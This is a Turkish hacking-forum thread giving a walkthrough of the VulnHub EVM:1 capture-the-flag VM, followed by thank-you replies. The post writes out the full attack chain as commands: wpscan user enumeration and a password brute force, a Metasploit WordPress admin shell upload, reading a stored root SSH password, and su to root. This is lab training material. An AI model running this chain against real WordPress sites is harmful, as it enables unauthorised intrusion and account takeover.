THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

EVM:1 Zafiyetli Makinesinin Çözümü//"P4RS

P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
7
1928
09-12-2019 13:08
#1
Merhabalar TürkHackTeam ailesi, bugün sizlere EVM:1 VulnHub Zafiyetli Makinesinin çözümünü göstereceğim.



https://www.vulnhub.com/entry/evm-1,391/



Makine İsmi: EVM: 1

Yayınlanma Tarihi: 2 Kasım 2019

Yapımcı: Ic0de

Seri: EVM

Açıklama: Hedefte ki Flag.txt dosyasını bulmak ve root olmak

Dosya Boyutu: 780 MB

İşletim Sistemi: Linux

Zorluk Derecesi: Orta







Öncelikle hedefin IP adresini öğrenmek için netdiscover aracını kullanıyoruz. Terminale
Kod:
sudo netdiscover
yazalım.



IP adresini yakaladık.



Ardından NMAP taraması yaparak açık portlar hakkında bilgi toplayacağız. Terminale
Kod:
nmap -A 192.168.1.16
yazalım ve açık portlara bakalım. SSH ve 80 portu açık yani bir site var.



Siteye gidelim ve içeriğe bakalım. İçerikten pek de bir şey çıkmadı sadece mesaj olarak /wordpress vermişler.



Siteyi kazımak için dirb aracını kullanıyoruz. Terminale
Kod:
dirb http://192.168.1.16/
yazdık ve tamaya başladı. /wordpress dizinini buldu bizlere.



Siteyi açtım ve URL sonuna /wordpress ekledim. Bu şekilde bir arayüz karşıladı beni.



Wpscan ile daha fazla wordpress dizini ile ilgili bilgi toplayacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/ -e at -e ap -e u
yazarak taramayı başlatıyoruz. (ap : Tüm eklentileri
at : Tüm temaları
u : Oturum açmış bütün kullanıcıları listeler.)



Gördüğünüz gibi c0rrupt3d_brain isimli bir kullanıcıyı yakaladı.



Şimdi bu kullanıcı için kaba kuvvet saldırısı yapacağız bunun için de rockyou.txt dosyasını kullanacağız. Terminale
Kod:
wpscan --url http://192.168.1.16/wordpress/  -U c0rrupt3d_brain -P rockyou.txt dosya yolu
yazıyoruz.



Tarama sonucu şifremizi buluyor şifre: 24992499 olarak bulduk.



Exploit zamanı (: Terminale
Kod:
msfconsole
yazalım.



Kod:
search webapp
yazalım bizlere siteye ilk girdiğimizde ipucu vermişti zaten.



Burada exploit/unix/webapp/wp_admin_shell_upload exploitini kullanacağız.



Direk kullanmak için
Kod:
use 105
yazdım çünkü baş tarafından 105 id'si vardı. Ayarlarına bakmak için
Kod:
show options
yazalım.



Ayarları yapmak için
Kod:
set RHOSTS 192.168.1.16
set TARGETURU /wordpress
set USERNAME c0rrupt3d_brain
set PASSWORD 24992499
exploit
yazalım.
Ve içerideyiz.



home dizinine gitmek içni
Kod:
cd /home
ve içeride ki bilgileri görmek için
Kod:
ls
yazdık. İçeride root3r dizinini gördük ve içeri girmek için
Kod:
cd root3r
ve bilgileri yazdırmak için
Kod:
ls
yazdık. İçeride ssh bağlantısının şifresi yazan bir dosya bulduk.



Bunu
Kod:
cat .root_password_ssh.txt
ile yazdırdığımda da şifreyi yani willy26 olduğunu öğrendik.



Şimdi yetki yükseltme işlemi yapacağız. İlk olarak
Kod:
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
yazarak yetki yükselttik. Şimdi
Kod:
 su root
şifreye de willy26 yazalım. Ardından
Kod:
cd /root
ls
cat proof.txt
yazarak işlemi bitirelim (:











Konum bu kadardı arkadaşlar, başka bir konumda görüşmek üzere sağlıcakla..


---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Konu P4RS tarafından (21-12-2019 22:14 Saat 22:14 ) değiştirilmiştir.
Rey
Rey - ait Kullanıcı Resmi (Avatar)
Deneyimli Moderatör
Üyelik tarihi:
07/2016
Nereden:
Kader
Mesajlar:
2.706
Konular:
611
Teşekkür (Etti):
597
Teşekkür (Aldı):
1261
Ticaret:
(0) %
09-12-2019 13:10
#2
Elinize Sağlık Pars Bey
---------------------
Eronmay
GZM16 - ait Kullanıcı Resmi (Avatar)
Katılımcı Üye
Üyelik tarihi:
05/2018
Nereden:
Uzman Çavuş
Mesajlar:
387
Konular:
3
Teşekkür (Etti):
248
Teşekkür (Aldı):
203
Ticaret:
(0) %
09-12-2019 13:41
#3
Eline Sağlık.
--------------------- Anılmakla hangi ruh olmaz ki sarhoş!
x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
09-12-2019 15:47
#4
Hocam güzel konu olmuş özellikle siber güvenlik klübü için bir ön bilgilendirme denebilir Ellerinize sağlık
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
09-12-2019 22:37
#5
Alıntı:
Eronmay´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Pars Bey
Alıntı:
GZM16´isimli üyeden Alıntı Mesajı göster
Eline Sağlık.
Alıntı:
Noah Parker´isimli üyeden Alıntı Mesajı göster
Hocam güzel konu olmuş özellikle siber güvenlik klübü için bir ön bilgilendirme denebilir Ellerinize sağlık
Beğenmenize sevindim arkadaşlar
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
PourLa - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
03/2016
Nereden:
Mesajlar:
1.668
Konular:
310
Teşekkür (Etti):
630
Teşekkür (Aldı):
872
Ticaret:
(0) %
09-12-2019 22:49
#6
Ellerin dert görmesin
---------------------
PourLa
Html/Css > Python > C ve C++
( }-----{ TÜRK HACK TEAM }-----{ )
Twitter | Telegram | İnstagram
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
09-12-2019 23:13
#7
Elinize sağlık hocam güzel bir anlatım olmuş Wordpress panel üzerinden de reverse shell yöntemi ile içeri sızabiliriz diye tahmin ediyorum. Yapılan işlem aynı oluyor ama söylemek istedim
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
P4RS Teşekkür etti.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
21-12-2019 22:17
#8
Videolu çözümü eklenmiştir.
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler